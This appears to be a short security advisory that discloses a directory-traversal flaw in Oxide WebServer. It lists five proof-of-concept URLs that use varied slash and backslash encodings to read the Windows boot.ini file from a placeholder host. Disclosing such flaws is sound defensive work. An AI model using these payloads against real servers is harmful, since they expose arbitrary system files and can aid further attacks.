11 lines
No EOL
599 B
Text
11 lines
No EOL
599 B
Text
source: https://www.securityfocus.com/bid/50845/info
|
|
|
|
Oxide WebServer is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface.
|
|
|
|
Exploiting this issue will allow an attacker to view arbitrary files within the context of the webserver. Information harvested may aid in launching further attacks.
|
|
|
|
http://www.example.com/..\..\..\boot.ini
|
|
http://www.example.com/..\\..\\..\\boot.ini
|
|
http://www.example.com/..\/..\/..\/boot.ini
|
|
http://www.example.com//..\/..\/..\boot.ini
|
|
http://www.example.com/.\..\.\..\.\..\boot.ini |